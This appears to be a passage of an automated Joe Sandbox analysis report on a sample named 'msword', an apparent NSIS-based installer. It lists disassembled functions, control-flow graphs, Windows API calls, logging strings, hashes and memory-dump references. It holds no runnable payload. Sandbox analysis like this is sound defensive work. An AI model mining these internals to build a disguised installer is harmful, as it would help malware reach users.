                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                    • API String ID: 2435955865-239407132
                                                                    • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                    • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                    Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                    APIs
                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 3581403547-784952888
                                                                    • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                    • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                    Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                    Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                    • String ID:
                                                                    • API String ID: 310444273-0
                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                    Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                    Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                                    • DestroyWindow.USER32 ref: 004054E6
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: @rD
                                                                    • API String ID: 3282139019-3814967855
                                                                    • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                    • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                    APIs
                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                    Strings
                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                    • Jump: %d, xrefs: 00401602
                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                    • BringToFront, xrefs: 004016BD
                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                    • detailprint: %s, xrefs: 00401679
                                                                    • Sleep(%d), xrefs: 0040169D
                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                    • Call: %d, xrefs: 0040165A
                                                                    • Rename: %s, xrefs: 004018F8
                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
